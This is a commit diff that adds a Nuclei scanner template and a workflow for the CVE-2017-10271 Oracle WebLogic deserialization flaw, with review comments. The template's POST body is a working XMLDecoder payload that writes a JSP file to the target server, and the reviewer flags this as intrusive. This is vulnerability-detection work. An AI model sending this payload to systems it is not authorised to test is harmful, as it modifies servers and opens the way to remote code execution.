Added template CVE-2017-10271 for Weblogic. Added Weblogic workflow.
parent
dd8d680f64
commit
7a21babcd4
|
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2017-10271
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CVE-2017-10271
|
||||||
|
author: dr_set
|
||||||
|
severity: high
|
||||||
|
description: Takeover of Oracle WebLogic Server. Versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
|
||||||
|
reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wls-wsat/CoordinatorPortType"
|
||||||
|
headers:
|
||||||
|
Content-Type: text/xml
|
||||||
|
body: "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">
|
||||||
|
<soapenv:Header>
|
||||||
|
<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">
|
||||||
|
<java><java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">
|
||||||
|
<object class=\"java.io.PrintWriter\">
|
||||||
|
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test123.jsp</string>
|
||||||
|
<void method=\"println\">
|
||||||
|
<string>
|
||||||
|
<![CDATA[<% out.print(\"test123\"); %>]]>
|
||||||
|
</string>
|
||||||
|
</void>
|
||||||
|
<void method=\"close\"/>
|
||||||
|
</object>
|
||||||
|
</java></java>
|
||||||
|
</work:WorkContext>
|
||||||
|
</soapenv:Header>
|
||||||
|
<soapenv:Body/>
|
||||||
|
</soapenv:Envelope>"
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/bea_wls_internal/test123.jsp"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "test123"
|
|
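Review bot: The only matcher is the word `test123`, which is also part of the path requested by the final GET, so an error page that echoes the requested URL would be reported as a finding. Add `matchers-condition: and` together with a `- type: status` matcher for `200`, and set `part: body` on the word matcher. The POST also writes `test123.jsp` under the server's deployment directory and nothing in the template removes it, so every run modifies the target and leaves an artifact behind. The `description` should say this plainly (for example "intrusive: writes test123.jsp to the target and does not remove it"), so operators can exclude the template from non-intrusive scans and defenders know which file to look for and delete. The write path hard-codes `AdminServer` and `9j4dqk`, which appear to come from the referenced vulhub environment, so a miss presumably does not show that a host is patched and the description should say that too.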
@ -0,0 +1,15 @@
|
||||||
|
id: weblogic-workflow
|
||||||
|
info:
|
||||||
|
name: WebLogic Security Checks
|
||||||
|
author: dr_set
|
||||||
|
description: A simple workflow that runs all WebLogic related nuclei templates on a given target.
|
||||||
|
|
||||||
|
workflows:
|
||||||
|
|
||||||
|
- template: technologies/weblogic-detect.yaml
|
||||||
|
|
||||||
|
subtemplates:
|
||||||
|
- template: cves/2017/CVE-2017-10271.yaml
|
||||||
|
- template: cves/2019/CVE-2019-2725.yaml
|
||||||
|
- template: cves/2020/CVE-2020-2551.yaml
|
||||||
|
- template: cves/2020/CVE-2020-14882.yaml
|
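Review bot: The workflow `description` does not say that the `cves/2017/CVE-2017-10271.yaml` subtemplate writes a file to the target, and it runs on every host where `technologies/weblogic-detect.yaml` matches. Extend it with something like `Includes CVE-2017-10271, which writes a JSP file to the target.`, or move that template into a separate, explicitly intrusive workflow. The description also says "all WebLogic related nuclei templates" while the list is four fixed paths, three of which are not part of this commit; their presence in the repository should be confirmed, and "all" reworded to match the fixed list.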